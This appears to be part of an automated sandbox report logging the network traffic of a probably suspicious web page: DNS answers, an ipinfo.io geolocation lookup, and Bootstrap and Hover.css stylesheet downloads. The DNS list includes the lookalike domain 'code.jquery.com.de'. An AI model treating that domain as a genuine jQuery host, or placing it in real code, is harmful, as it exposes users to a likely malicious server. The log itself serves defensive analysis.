Jun 20, 2024 18:14:10.606959105 CEST	1.1.1.1	192.168.2.10	0x29fd	No error (0)	maxcdn.bootstrapcdn.com		104.18.10.207	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:10.610806942 CEST	1.1.1.1	192.168.2.10	0x8591	No error (0)	code.jquery.com.de		38.34.185.163	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:10.611622095 CEST	1.1.1.1	192.168.2.10	0xee2a	No error (0)	ucarecdn.com		2.16.164.82	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:10.611622095 CEST	1.1.1.1	192.168.2.10	0xee2a	No error (0)	ucarecdn.com		2.16.164.40	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:13.021945953 CEST	1.1.1.1	192.168.2.10	0x1e3	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 20, 2024 18:14:13.021945953 CEST	1.1.1.1	192.168.2.10	0x1e3	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.50	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:13.021945953 CEST	1.1.1.1	192.168.2.10	0x1e3	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.32	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:13.021945953 CEST	1.1.1.1	192.168.2.10	0x1e3	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.13	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:13.021945953 CEST	1.1.1.1	192.168.2.10	0x1e3	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.8	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:13.022645950 CEST	1.1.1.1	192.168.2.10	0x4612	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 20, 2024 18:14:14.765671015 CEST	1.1.1.1	192.168.2.10	0x2023	No error (0)	www.google.com			65	IN (0x0001)	false
Jun 20, 2024 18:14:14.766689062 CEST	1.1.1.1	192.168.2.10	0x306e	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:14.823853970 CEST	1.1.1.1	192.168.2.10	0x796d	No error (0)	code.jquery.com.de		38.34.185.163	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:16.975980043 CEST	1.1.1.1	192.168.2.10	0x4c5e	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 20, 2024 18:14:16.975980043 CEST	1.1.1.1	192.168.2.10	0x4c5e	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.13	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:16.975980043 CEST	1.1.1.1	192.168.2.10	0x4c5e	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.32	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:16.975980043 CEST	1.1.1.1	192.168.2.10	0x4c5e	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.8	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:16.975980043 CEST	1.1.1.1	192.168.2.10	0x4c5e	No error (0)	d26p066pn2w0s0.cloudfront.net		18.239.36.50	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:16.978207111 CEST	1.1.1.1	192.168.2.10	0x2335	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 20, 2024 18:14:43.624804974 CEST	1.1.1.1	192.168.2.10	0xaaa8	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jun 20, 2024 18:15:14.818175077 CEST	1.1.1.1	192.168.2.10	0xca87	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

maxcdn.bootstrapcdn.com

ucarecdn.com

code.jquery.com.de

logo.clearbit.com

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.10	49707	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:02 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-20 16:14:02 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 20 Jun 2024 16:14:02 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-20 16:14:02 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49711	104.18.11.207	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:11 UTC	549	OUT	GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1 Host: maxcdn.bootstrapcdn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: null sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:11 UTC	932	IN	HTTP/1.1 200 OK Date: Thu, 20 Jun 2024 16:14:11 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CDN-PullZone: 252412 CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74 CDN-RequestCountryCode: US Access-Control-Allow-Origin: * Cache-Control: public, max-age=31919000 ETag: W/"450fc463b8b1a349df717056fbb3e078" Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 10/31/2023 18:54:29 CDN-EdgeStorageId: 941 timing-allow-origin: * cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff CDN-Status: 200 CDN-RequestId: 5d2c135cc52daf7e5ec6fa8d26de92ba CDN-Cache: HIT CF-Cache-Status: HIT Age: 8547169 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 896d0ce7ca811a48-EWR alt-svc: h3=":443"; ma=86400
2024-06-20 16:14:11 UTC	437	IN	Data Raw: 37 63 30 65 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 Data Ascii: 7c0e/! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 2d 73 61 Data Ascii: mary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sa
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 Data Ascii: tion:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{marg
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 7b 2d 77 65 62 Data Ascii: uto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-web
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 Data Ascii: n-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-wei
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 Data Ascii: font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-rad
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 Data Ascii: ,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 Data Ascii: 67%;max-width:66.666667%}.col-9{-webkit-box-flex:0;-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.66666
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 36 37 25 7d 2e 6f 66 66 73 65 74 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 Data Ascii: 67%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.333333%}.offset-8{margin-left:66.666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.333333%}.offset
2024-06-20 16:14:11 UTC	1369	IN	Data Raw: 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 Data Ascii: idth:83.333333%}.col-sm-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-first{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49712	2.16.164.82	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:11 UTC	536	OUT	GET /eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css HTTP/1.1 Host: ucarecdn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:11 UTC	443	IN	HTTP/1.1 200 OK Content-Type: text/css Access-Control-Allow-Methods: HEAD, GET, OPTIONS Access-Control-Allow-Origin: * Content-Disposition: attachment; filename=hover.css ETag: "fac4178c15e5a86139c662dafc809501" Last-Modified: Wed, 20 Jan 2021 23:07:04 GMT Server: Uploadcare Cache-Control: public, max-age=31287138 Date: Thu, 20 Jun 2024 16:14:11 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding
2024-06-20 16:14:11 UTC	15941	IN	Data Raw: 30 30 30 30 43 30 30 30 0d 0a 2f 2a 21 0a 20 2a 20 48 6f 76 65 72 2e 63 73 73 20 28 68 74 74 70 3a 2f 2f 69 61 6e 6c 75 6e 6e 2e 67 69 74 68 75 62 2e 69 6f 2f 48 6f 76 65 72 2f 29 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 32 2e 33 2e 32 0a 20 2a 20 41 75 74 68 6f 72 3a 20 49 61 6e 20 4c 75 6e 6e 20 40 49 61 6e 4c 75 6e 6e 0a 20 2a 20 41 75 74 68 6f 72 20 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 69 61 6e 6c 75 6e 6e 2e 63 6f 2e 75 6b 2f 0a 20 2a 20 47 69 74 68 75 62 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 49 61 6e 4c 75 6e 6e 2f 48 6f 76 65 72 0a 0a 20 2a 20 48 6f 76 65 72 2e 63 73 73 20 43 6f 70 79 72 69 67 68 74 20 49 61 6e 20 4c 75 6e 6e 20 32 30 31 37 2e 20 47 65 6e 65 72 61 74 65 64 20 77 69 74 68 20 53 61 73 73 2e 0a 20 2a 2f 0a 2f 2a Data Ascii: 0000C000/! Hover.css (http://ianlunn.github.io/Hover/) * Version: 2.3.2 * Author: Ian Lunn @IanLunn * Author URL: http://ianlunn.co.uk/ * Github: https://github.com/IanLunn/Hover * Hover.css Copyright Ian Lunn 2017. Generated with Sass. //
2024-06-20 16:14:11 UTC	15538	IN	Data Raw: 58 28 34 70 78 29 3b 0a 20 20 7d 0a 20 20 36 36 2e 36 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 70 78 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 70 78 29 3b 0a 20 20 7d 0a 20 20 38 33 2e 32 35 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 31 70 78 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 31 70 78 29 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c Data Ascii: X(4px); } 66.6% { -webkit-transform: translateX(-2px); transform: translateX(-2px); } 83.25% { -webkit-transform: translateX(1px); transform: translateX(1px); } 100% { -webkit-transform: translateX(0); transform: transl
2024-06-20 16:14:11 UTC	16384	IN	Data Raw: 63 6f 6c 6f 72 3b 0a 7d 0a 2e 68 76 72 2d 66 61 64 65 3a 68 6f 76 65 72 2c 20 2e 68 76 72 2d 66 61 64 65 3a 66 6f 63 75 73 2c 20 2e 68 76 72 2d 66 61 64 65 3a 61 63 74 69 76 65 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 30 39 38 44 31 3b 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 0a 2f 2a 20 42 61 63 6b 20 50 75 6c 73 65 20 2a 2f 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 68 76 72 2d 62 61 63 6b 2d 70 75 6c 73 65 20 7b 0a 20 20 35 30 25 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 33 32 2c 20 31 35 32 2c 20 32 30 39 2c 20 30 2e 37 35 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 68 76 72 2d 62 61 63 6b 2d 70 75 6c 73 65 20 7b 0a 20 20 Data Ascii: color;}.hvr-fade:hover, .hvr-fade:focus, .hvr-fade:active { background-color: 